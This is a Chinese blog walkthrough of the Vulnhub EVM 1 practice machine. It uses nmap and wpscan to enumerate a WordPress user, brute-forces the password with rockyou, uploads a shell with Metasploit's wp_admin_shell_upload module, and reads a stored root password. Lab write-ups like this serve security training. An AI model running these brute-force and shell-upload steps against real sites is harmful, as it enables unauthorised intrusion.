Vulnhub:EVM 1靶机

kali:192.168.111.111

靶机:192.168.111.131

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.131

image

使用nmap的http-enum脚本扫描出目标为wordpress站点,使用wpscan枚举目标用户,得到用户:c0rrupt3d_brain

wpscan --url http://192.168.111.131/wordpress/ -e u

image

用收集到的用户爆破密码,得到密码:24992499

wpscan --url http://192.168.111.131/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

image

使用msf的exploit/unix/webapp/wp_admin_shell_upload模块拿shell

msfdb run
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.111.131
set username c0rrupt3d_brain
set password 24992499
set targeturi /wordpress

image

提权

在/home/root3r/.root_password_ssh.txt发现root用户的密码:willy26

image

flag

image

posted @   ctostm  阅读(39)  评论(0编辑  收藏  举报
相关博文:
·  Vulnhub:DC-2靶机
·  Vulnhub:Mr-Robot:1靶机
·  Vulnhub-EVM-WP
·  Vulnhub 靶场 BLOGGER: 1
·  Vulnhub 靶场 SHENRON: 3
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
· 三行代码完成国际化适配,妙~啊~
点击右上角即可分享
微信分享提示
SQL AI 助手